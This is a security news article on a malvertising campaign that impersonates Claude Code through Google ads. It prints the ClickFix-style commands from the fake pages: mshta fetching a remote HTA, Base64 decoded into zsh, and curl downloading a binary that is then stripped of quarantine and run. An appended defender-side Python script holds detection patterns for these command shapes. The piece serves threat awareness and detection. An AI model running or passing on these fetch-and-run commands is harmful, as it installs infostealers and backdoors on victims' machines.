Fake Claude Code Ads on Google Deliver Malware to Windows and macOS
Fake advertisements that deliver malware, known as malvertising, are widespread today. These ads impersonate the names of popular IT products and services, and this time Claude Code, a well-known AI coding tool, has been added to the list of impersonated brands.
According to a report published on the anti-malware vendor's official website, Bitdefender has detected a malware distribution campaign targeting users of Windows and macOS. The campaign begins with the attackers buying Google ads that present a fake "Claude Code" ad closely resembling the real one. The fake ad appears when the victim searches Google for "download claude code" or similar terms.
After the victim clicks the ad, they are taken to a fake application or documentation page hosted on Squarespace. The page mimics the real Claude Code page closely; the main tell is a URL that does not match the real domain. The page then prompts the victim to download and install the (fake) Claude Code. Instead of a normal download, the victim is given a command to run, in the manner of ClickFix attacks, which use a fake error message to persuade the victim to run a "fix" that installs malware. The exact step depends on the script on the fake page and differs by platform as follows.
For Windows users
The page instructs the victim to run the following command in PowerShell:
C:\Windows\SysWOW64\mshta.exe https://download.active-version[.]com/claude
Alternatively, the victim may be told to run the same command from the Windows command prompt (CMD):
C:\Windows\SysWOW64\mshta.exe https://download.active-version[.]com/claude
Both commands launch mshta.exe, a Windows component for running HTML Application (HTA) files. Running the remote HTA downloads an installer for two infostealers, malware that steals data from the victim's machine, detected as:
Trojan.Stealer.GJ
Trojan.Stealer.GK
The downloaded package contains an executable file and an HTA file. The HTA file decrypts a payload of Microsoft Intermediate Language (MSIL) code in memory and then runs it, which drops two further malware components detected as:
IL:Trojan.MSILZilla.245316
Gen:Variant.Barys.509034
For macOS users
Because the built-in protections on macOS are stronger than those on Windows, the victim has to perform more steps, and the attackers rely on obfuscation to get the malware onto the machine. It starts with the victim running a command that decodes a Base64-encoded string and pipes the result into zsh:
echo "macOS Download: http://code.claude[.]ai/download/" && curl -sSfL $(echo '| base64 -D) | zsh
Once the victim runs that command, a second script is fetched and immediately decodes and decompresses the payload. The script looks like this:
#!/bin/zsh
tnyrzi=$(base64 -D <<'PAYLOAD_END' | gunzip
PAYLOAD_END
)
eval "$tnyrzi"
This script in turn runs another command that downloads a Mach-O binary from the wriconsult[.]com domain, strips its quarantine attribute, marks it executable and runs it:
#!/bin/zsh
curl -o /tmp/helper https://wriconsult[.]com/n8n/update && xattr -c /tmp/helper && chmod +x /tmp/helper && /tmp/helper
All of this happens silently after the victim runs the first command. The malware installed on the victim's machine is a previously unknown backdoor. It includes anti-sandbox and anti-VM checks, so it refuses to run inside analysis environments, which makes it harder for tools and analysts to examine.
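As an added, defender-side example that is not part of the Bitdefender report or this article, the Python below applies simple pattern rules for the command shapes described above (mshta.exe fetching a remote URL, Base64 decoded into a shell, curl piped into a shell, quarantine attribute stripped before execution) to constructed process-creation log lines; the log format, field names and sample values are assumptions.

```python
import re

# Rules for the ClickFix-style command lines described in the article.
# Each pattern is applied to the full command-line field of a log entry.
RULES = [
    ("mshta_remote_hta",
     re.compile(r"mshta(?:\.exe)?\s+https?:", re.IGNORECASE)),
    ("base64_pipe_to_shell",
     re.compile(r"base64\s+-[dD]\b.*\|\s*(?:zsh|bash|sh)\b")),
    ("curl_pipe_to_shell",
     re.compile(r"\bcurl\b.*\|\s*(?:zsh|bash|sh)\b")),
    # xattr -c on a path, then chmod +x on the same path, then that path executed
    ("quarantine_strip_then_exec",
     re.compile(r"xattr\s+-c\s+(\S+).*chmod\s+\+x\s+\1.*\1")),
]

# Constructed sample log lines (hypothetical format); URLs are defanged with [.]
# exactly as the article prints them, and the Base64 string is a dummy value.
SAMPLE_LOG = [
    r"ProcessCreate user=alice cmd=C:\Windows\SysWOW64\mshta.exe https://download.active-version[.]com/claude",
    'ProcessCreate user=bob cmd=echo "macOS Download" && curl -sSfL $(echo aHR0cA== | base64 -D) | zsh',
    "ProcessCreate user=bob cmd=curl -o /tmp/helper https://wriconsult[.]com/n8n/update && xattr -c /tmp/helper && chmod +x /tmp/helper && /tmp/helper",
    r"ProcessCreate user=carol cmd=mshta.exe C:\Users\carol\app.hta",
    "ProcessCreate user=dave cmd=base64 -d report.b64 > report.txt",
]


def classify(cmdline: str) -> list:
    """Return the names of every rule that the command line matches."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(lines):
    """Yield (line_number, hits) for each log line that triggers at least one rule."""
    for n, line in enumerate(lines, 1):
        hits = classify(line)
        if hits:
            yield n, hits


if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(hits)}")
```

The local-HTA and plain `base64 -d` lines are included to show the rules do not fire on ordinary use of the same tools; in production the hits would be enriched with the parent process and user before alerting.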